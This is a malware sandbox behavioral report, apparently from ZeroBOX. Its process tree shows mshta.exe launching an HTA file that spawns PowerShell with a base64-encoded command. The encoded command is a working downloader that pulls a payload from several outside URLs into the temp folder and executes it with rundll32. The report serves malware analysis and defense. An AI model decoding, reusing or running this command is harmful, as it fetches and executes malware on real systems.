popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\Bqkz.hta

    3000

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQAZgBvAHIAdABoAG8AbgAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbABsAG8AcwBtAGkAcgB0AG8AcwAuAGMAbwBtAC8AcwBqAG4ALwB4ADkAVABLAGkAeQBMAEwAawBUACwAaAB0AHQAcABzADoALwAvAHoAYQBpAG4AYwBvAC4AbgBlAHQALwBPAGQATwBVAC8ARAAwAFkAVQAzAEcARQAsAGgAdAB0AHAAcwA6AC8ALwBjAGkAdAB5AHQAZQBjAGgALQBzAG8AbAB1AHQAaQBvAG4AcwAuAGMAbwBtAC8ANgBNAGgAMQBrAC8ASgBEAG8ASgBiACwAaAB0AHQAcABzADoALwAvAG4AYQB5AGEAZABvAGYAbwB1AG4AZABhAHQAaQBvAG4ALgBvAHIAZwAvAHcAWABhAEsAbQAvAEYANQBNAG4ASABGAHEALABoAHQAdABwAHMAOgAvAC8AYwBhAHIAbABhAGQAdgBvAGcAYQBkAGEAdAByAGkAYgB1AHQAYQByAGkAYQAuAGMAbwBtAC8AdAB2AG4AcQA5AC8AZQBHAGIAUgBCAGUAeQA4AG8ANwBNAGsALABoAHQAdABwAHMAOgAvAC8AbQByAGMAcgBpAHoAcQB1AG4AYQAuAGMAbwBtAC8ATAA3AGMAYwBOAC8AawBVAEEARgBnAGwAbQBnAFcALABoAHQAdABwAHMAOgAvAC8AZwBzAHMAYwBvAHIAcABvAHIAYQB0AGkAbwBuAGwAdABkAC4AYwBvAG0ALwBvAGsAUwBmAGoALwBRAEIAbwBhAEQAUABSAFAANQBoAEYALABoAHQAdABwAHMAOgAvAC8AZQByAGcALQBlAGcALgBjAG8AbQAvAG8AYwBtAGIALwBWADQAUABqAGUAbgBDAEwAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAcABpAGcAbgBvAG4AIABpAG4AIAAkAGYAbwByAHQAaABvAG4AKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAHAAaQBnAG4AbwBuACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA2ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABzAGkAbAB0AGkAZQByAEgAbwBsAGQAYgBhAGMAawAuAG0AYQBsAGkAbgBmAGwAdQBlAG4AYwBlADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcwBpAGwAdABpAGUAcgBIAG8AbABkAGIAYQBjAGsALgBtAGEAbABpAG4AZgBsAHUAZQBuAGMAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgB6AEEARwBrAEEAYgBBAEIAMABBAEcAawBBAFoAUQBCAHkAQQBFAGcAQQBiAHcAQgBzAEEARwBRAEEAWQBnAEIAaABBAEcATQBBAGEAdwBBAHUAQQBHADAAQQBZAFEAQgBzAEEARwBrAEEAYgBnAEIAbQBBAEcAdwBBAGQAUQBCAGwAQQBHADQAQQBZAHcAQgBsAEEAQwB3AEEAVABRAEIAdgBBAEgAUQBBAFoAQQBBADcAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA="

      2208

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf